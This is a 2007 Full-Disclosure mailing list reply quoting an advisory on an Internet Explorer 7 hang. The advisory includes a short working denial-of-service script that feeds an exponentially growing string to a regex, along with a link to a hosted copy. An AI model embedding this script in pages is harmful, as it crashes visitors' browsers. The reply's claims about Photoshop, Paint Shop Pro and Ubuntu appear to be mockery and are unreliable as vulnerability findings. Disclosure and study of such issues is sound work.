-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have confirmed that both Adobe Photoshop 7.0 and 7.1 are vulnerable to this issue. However all versions of Paint Shop Pro that I tested are not vulnerable. I repeat, Paint Shop Pro is not vulnerable to this issue.
Ubuntu is not vulnerable to this issue in any way. Good find buddy! - - Dr. Neal Krawetz, PhD http://www.hackerfactor.com/blog/ On Tue, 17 Apr 2007 13:09:50 -0400 "J. Oquendo" <[EMAIL PROTECTED]> wrote: >Product: Internet Explorer Version 7.0.5730.11 >Impact: Browser crash possibly more >Author: Jesus Oquendo >echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' > > >I. BACKGROUND >Why bother? Who doesn't know what Internet Explorer and Microsoft >are. > >II. DESCRIPTION >IE 7 is vulnerable to a script which causes the browser to hang. >The >memory and CPU usage go through the roof. Originally the script >caused >(and still causes) Safari and Konqueror to crash. > >III SOLUTION >Stop using Microsoft products or deal with a new advisory every >other >day. > >IV. Proof >http://www.infiltrated.net/stupidInternetExploder.html > >V. Code > >$ more /stupidInternetExploder.html > ><script> > >var reg = /(.)*/; > >var z = 'Z'; > while (z.length <= >9999999999999999999999999999999999999999999999999999999999999999999 >99999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999 >99999999999999999999999) z+=z; > var boum = reg.exec(z); > ></script> > >Goodbye > > >J. Oquendo >http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 >sil . infiltrated @ net http://www.infiltrated.net > >The happiness of society is the end of government. >John Adams -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYlQWQACgkQDpFP8dW5K4Z/bQQAhmwJc2y9RBZ7nFAEWo4Q/aIpvwVj 7Xa+Ax+CUSe1O+hINFX5I+hLoPckPNVoC3YtPA7rQqT6dQ3xIubFgZAGFs62v7p936yi p4esv/frDaklOmlEGjVZqcoxJATwj8HBPthO3YZk5D1HRJhkQ0J72ucEkBgK6tw/YeuL dUoEASE= =FbVw -----END PGP SIGNATURE----- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/CAaCXv1R3e4Y8wdXYkvHiVBp8Vi7B9M9/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
